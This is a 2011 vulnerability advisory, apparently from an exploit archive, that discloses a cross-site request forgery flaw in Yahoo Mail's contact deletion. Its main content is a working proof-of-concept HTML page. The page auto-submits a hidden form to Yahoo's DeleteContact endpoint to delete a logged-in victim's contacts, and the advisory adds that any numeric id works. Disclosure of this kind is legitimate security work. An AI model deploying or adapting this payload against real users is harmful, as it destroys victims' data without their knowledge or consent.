
Yahoo! Mail Cross Site Request Forgery

Posted on 05 December 2011

=======================================================================
YAHOOMAIL CSRF Vulnerability
=======================================================================

# Vulnerability found in: Yahoomail Delete Contact module
# Email: prakhar.agrawal26@gmail.com
# Company: AKS IT Services Pvt. Ltd
# Credit: Prakhar Agrawal
# Email Service: Yahoomail
# Category: Mail service
# Site page: http://www.yahoomail.com
# Platform: Java
# Proof of concept
# Targeted URL: http://address.mail.yahoo.com/

Script to delete contacts from the contact list through cross-site request forgery:
................................................................................................................
<html>
<body>
<form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/DeleteContact.json?" method="POST">
<input type="hidden" name="action" value="delete_contacts">
<input type="hidden" name="id" value="$Numeric No.$">
</form>
<script>document.csrf.submit();</script>
</body>
</html>
..................................................................................................................

Put any numeric value (e.g. 1, 2, 3, 4) in the id parameter and try to forge the functionality. It works.

# If you have any questions, comments, or concerns, feel free to contact me.
